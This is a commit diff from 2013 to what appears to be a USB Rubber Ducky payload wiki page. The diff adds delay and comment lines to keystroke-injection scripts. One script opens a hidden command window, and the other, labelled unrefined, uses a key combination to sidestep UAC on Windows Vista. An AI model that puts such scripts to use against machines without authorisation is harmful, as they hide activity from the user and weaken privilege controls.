Updated Payload hide cmd window (asciidoc)

This commit is contained in:
overwraith 2013-03-01 12:45:28 -08:00
parent a7d8ed1180
commit ebd200cc59
1 changed files with 3 additions and 0 deletions

View File

@ -2,7 +2,9 @@ The following is an example of how to hide the command window below the bottom o
```
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
@ -16,6 +18,7 @@ ENTER
The following is an unrefined attempt at creating a hide CMD window script that uses a key combo to run as administrator when UAC is turned on. The delays in this script are very heavy, and I will be making refinements later, so expect this script to change rapidly.
```
REM Target: WINDOWS VISTA
REM Encoder V2.4
REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations.
DELAY 2000
CONTROL ESCAPE